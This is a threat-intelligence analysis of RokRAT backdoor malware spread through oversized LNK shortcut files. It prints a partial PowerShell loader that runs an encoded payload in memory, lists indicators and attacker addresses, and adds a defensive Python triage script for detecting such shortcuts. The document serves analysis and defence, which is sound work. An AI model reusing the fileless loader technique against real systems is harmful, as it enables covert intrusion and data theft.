AhnLab SEcurity intelligence Center (ASEC) has confirmed that abnormally large shortcut files (*.LNK) carrying backdoor-type malware are being steadily distributed. The recently identified LNK files are being distributed to domestic users, especially people connected to North Korea-related affairs. The confirmed LNK file names are as follows.
- National Information Academy 8th integrated course certificate (final version).lnk
- Gate access roster 2024.lnk
- Northeast Project (Congressional Research Service (CRS Report).lnk
- Equipment list.lnk
The confirmed LNK files contain a command that runs PowerShell through CMD, and they are similar to the case described in last year's post ‘RokRAT malware distributed through link files (*.lnk): RedEyes (ScarCruft)’ [1]. This type is characterized by carrying a normal document file, script code, and malicious PE data inside the LNK file.
An overview of the malware's execution flow is as follows.
When the LNK file is executed, a PowerShell command creates and opens a normal (decoy) document file.
Afterwards, three files are created in the %public% folder. The names and roles of the files created at this point are as follows.
File name | Location in LNK file | Function |
---|---|---|
viewer.dat | 0x2BC97 (size:0xD9402) | Encoded RokRAT malware |
search.dat | 0x105099 (size:0x5AA) | Run viewer.dat file |
find.bat | 0x105643 (size:0x139) | Run search.dat file |
Table 1. List of files created
‘find.bat’, which is executed first, runs ‘search.dat’ through PowerShell. ‘search.dat’ then reads the ‘viewer.dat’ file and executes it filelessly, in memory.
# Read the encoded payload dropped in %public% as raw bytes
$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);   # 3072 = TLS 1.2
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);   # 34 = '"'
<omitted>   # the omitted part presumably resolves the kernel32 API delegates used below ($b, $a90234sb, $cake3sd23, $fried3sd23)
# Allocate a buffer, mark it executable, copy the payload into it and run it on a new thread (no file is written)
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);   # 0x40 = PAGE_EXECUTE_READWRITE
for($i = 0;$i -lt $byteCount;$i++) {
[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]); };
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);
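As an added example that is not part of the ASEC post, the following Python script turns the report's observations (an abnormally large shortcut, an embedded PE image, loader strings such as GlobalAlloc/VirtualProtect/CreateThread, a decoy document) into a static triage check for a single .lnk file; the header constant and the 64 KB size threshold are assumptions, and the sample bytes are constructed, not taken from a real sample.

```python
import re
import struct

# A shortcut starts with HeaderSize 0x4C followed by the ShellLink CLSID 00021401-0000-0000-C000-000000000046.
LNK_HEADER = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
SIZE_THRESHOLD = 64 * 1024  # assumed cut-off: ordinary shortcuts are a few KB, this campaign's LNK was about 1 MB
# Strings from the campaign's embedded loader and its dropped file names: hunting markers, not a signature.
LOADER_MARKERS = [b"powershell", b"-encoding byte", b"GlobalAlloc", b"VirtualProtect", b"CreateThread",
                  b"viewer.dat", b"search.dat", b"find.bat"]
DECOY_MAGIC = {b"%PDF": "pdf", b"\xd0\xcf\x11\xe0": "ole2 (doc/hwp/xls)", b"PK\x03\x04": "zip (docx/pptx)"}


def find_embedded_pe(data: bytes) -> list:
    """Offsets of embedded PE images: an 'MZ' whose e_lfanew field points at a 'PE\\0\\0' signature."""
    hits = []
    for m in re.finditer(b"MZ", data):
        off = m.start()
        if off + 0x40 > len(data):
            continue
        e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
        if e_lfanew < 0x10000 and data[off + e_lfanew:off + e_lfanew + 4] == b"PE\x00\x00":
            hits.append(off)
    return hits


def triage_lnk(data: bytes) -> dict:
    """Static triage of one .lnk: oversize plus embedded PE, loader strings or a decoy document."""
    report = {
        "is_lnk": data.startswith(LNK_HEADER),
        "size": len(data),
        "oversized": len(data) > SIZE_THRESHOLD,
        "pe_offsets": find_embedded_pe(data),
        "loader_markers": sorted(m.decode() for m in LOADER_MARKERS if m.lower() in data.lower()),
        "decoys": [name for magic, name in DECOY_MAGIC.items() if magic in data],
    }
    # Size alone is a weak signal; require a carved PE or several loader strings alongside it.
    report["suspicious"] = report["is_lnk"] and report["oversized"] and (
        bool(report["pe_offsets"]) or len(report["loader_markers"]) >= 3)
    return report


# Constructed sample (not a real LNK): header, PowerShell launch string, PDF decoy, padding, stub PE, loader text.
PE_STUB = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 0x20
SAMPLE = (LNK_HEADER + b"\x00" * (0x4C - len(LNK_HEADER))
          + b"cmd.exe /c powershell -windowstyle hidden ... %PDF-1.4 decoy " + b"\x00" * 70000 + PE_STUB
          + b"$exeFile = Get-Content -path $exePath -encoding byte; GlobalAlloc VirtualProtect CreateThread viewer.dat")
# Constructed benign shortcut: same header, a plain target path, nothing embedded.
BENIGN = LNK_HEADER + b"\x00" * 0x40 + b"C:\\Program Files\\Tool\\tool.exe"
```

Run `triage_lnk` over the bytes of each shortcut found in mail attachments or user folders; the returned offsets can be fed straight to a carving step that extracts the decoy, the script and the PE for further analysis.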
The data in ‘viewer.dat’ that is ultimately executed is RokRAT, a backdoor that uses cloud APIs to collect user information and perform various malicious actions according to the attacker’s commands.
The collected information is sent to the attacker’s cloud storage using services such as pCloud, Yandex and Dropbox. In these requests the User-Agent header is disguised as Googlebot, and the cloud URLs used are shown in the table below.
- User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Table 2. Cloud URL details used
Malicious actions that can be executed according to the attacker’s commands are as follows.
- Execute commands
- Collect directory listings
- Delete specific files (VBS, CMD, BAT, LNK extensions) in the startup folder
- Collect startup folder list, %APPDATA% folder list, and recently used file list
- Collect PC information (system information, IP, router information, etc.)
In addition to these, various other malicious actions can be performed; the collected information is saved in the %TEMP% folder and then uploaded to the attacker’s cloud server. The attacker email addresses identified during analysis are as follows.
- tanessha.samuel@gmail[.]com
- tianling0315@gmail[.]com
- w.sarah0808@gmail[.]com
- softpower21cs@gmail[.]com
As ASEC has consistently reported through its blog, the distribution of such malicious shortcut files is being confirmed frequently. In particular, malware targeting people in the unification, military and education fields has been consistently identified in the past, so special caution is required.
[File Diagnosis]
Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent.R579429 (2023.05.05.01)
[IoC]